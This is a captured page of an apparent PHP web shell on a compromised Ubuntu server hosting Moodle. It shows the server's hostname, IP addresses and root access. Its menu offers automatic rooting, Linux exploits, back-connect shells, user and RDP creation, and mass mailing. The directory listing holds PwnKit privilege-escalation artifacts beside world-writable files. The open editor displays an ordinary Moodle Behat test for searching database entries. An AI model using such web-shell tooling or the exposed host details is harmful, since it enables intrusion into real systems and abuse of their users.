Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
data /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_entries.feature
3.71
KB
-rwxrwxrwx
behat_mod_data.php
4.42
KB
-rwxrwxrwx
completion_condition_entries.f...
2.69
KB
-rwxrwxrwx
create_activity.feature
1.71
KB
-rwxrwxrwx
data_activities.feature
2.37
KB
-rwxrwxrwx
data_no_calendar_capabilities....
2.27
KB
-rwxrwxrwx
manageapproved.feature
3.6
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
required_entries.feature
14.46
KB
-rwxrwxrwx
view_entries.feature
5.88
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view_entries.feature
@mod @mod_data Feature: Users can view and search database entries In order to find the database entries that I am looking for As a user I need to list and search the database entries Background: Given the following "users" exist: | username | firstname | lastname | email | | student1 | Bob | 1 | student1@example.com | | student2 | Alice | 2 | student2@example.com | | teacher1 | Teacher | 1 | teacher1@example.com | And the following "tags" exist: | name | isstandard | | Tag1 | 1 | And the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | student1 | C1 | student | | student2 | C1 | student | And the following "activities" exist: | activity | name | intro | course | idnumber | | data | Test database name | Database intro | C1 | data1 | And the following "mod_data > fields" exist: | database | type | name | description | | data1 | text | Test field name | Test field description | | data1 | text | Test field 2 name | Test field 2 description | And the following "mod_data > templates" exist: | database | name | | data1 | singletemplate | | data1 | listtemplate | | data1 | addtemplate | | data1 | asearchtemplate | | data1 | rsstemplate | Scenario: Students can add view, list and search entries Given the following "mod_data > entries" exist: | database | Test field name | Test field 2 name | | data1 | Student entry 1 | | | data1 | Student entry 2 | | | data1 | Student entry 3 | | When I log in as "student1" And I am on "Course 1" course homepage And I follow "Test database name" Then I should see "Student entry 1" And I should see "Student entry 2" And I should see "Student entry 3" And I follow "View single" And I should see "Student entry 1" And I should not see "Student entry 2" And "2" "link" should exist And "3" "link" should exist And I follow "Next" And I should see "Student entry 2" And I should not see "Student entry 1" And I click on "3" "link" in the "region-main" "region" And I should see "Student entry 3" And I should not see "Student entry 2" And I follow "Previous" And I should see "Student entry 2" And I should not see "Student entry 1" And I should not see "Student entry 3" And I follow "Search" And I set the field "Test field name" to "Student entry 1" And I press "Save settings" And I should see "Student entry 1" And I should not see "Student entry 2" And I should not see "Student entry 3" And I follow "Search" And I set the field "Test field name" to "Student entry" And I set the field "Order" to "Descending" And I press "Save settings" And "Student entry 3" "text" should appear before "Student entry 2" "text" And "Student entry 2" "text" should appear before "Student entry 1" "text" @javascript Scenario: Check that searching by tags works as expected Given I log in as "student1" And I am on "Course 1" course homepage # This is required for now to prevent the tag suggestion menu from overlapping over the Save & view button. And I change window size to "large" And I add an entry to "Test database name" database with: | Test field name | Student original entry untagged | | Test field 2 name | Student original entry untagged 2 | And I add an entry to "Test database name" database with: | Test field name | Student original entry tagged | | Test field 2 name | Student original entry tagged 2 | And I set the field with xpath "//div[@class='datatagcontrol']//input[@type='text']" to "Tag1" And I press "Save and view" And I should see "Student original entry" And I should see "Tag1" in the "div.tag_list" "css_element" And I follow "Edit" And I should see "Tag1" in the ".form-autocomplete-selection" "css_element" And I follow "View list" And I should see "Tag1" in the "div.tag_list" "css_element" And I follow "Search" And I set the field with xpath "//div[@class='datatagcontrol']//input[@type='text']" to "Tag1" And I click on "[data-value='Tag1']" "css_element" When I press "Save settings" Then I should see "Student original entry tagged" And I should see "Student original entry tagged 2" And I should not see "Student original entry untagged" And I should not see "Student original entry untagged 2" Scenario: Check that searching by first and last name works as expected Given I log in as "student1" And I am on "Course 1" course homepage And I add an entry to "Test database name" database with: | Test field name | Student entry 1 | And I press "Save and view" And I log out And I log in as "student2" And I am on "Course 1" course homepage And I add an entry to "Test database name" database with: | Test field name | Student entry 2 | And I press "Save and view" And I log out When I log in as "teacher1" And I am on "Course 1" course homepage And I follow "Test database name" And I follow "Search" And I set the field "Author first name" to "Bob" And I press "Save settings" Then I should see "Student entry 1" And I should not see "Student entry 2" And I set the field "Author first name" to "" And I set the field "Author surname" to "2" And I press "Save settings" And I should not see "Student entry 1" And I should see "Student entry 2"
Close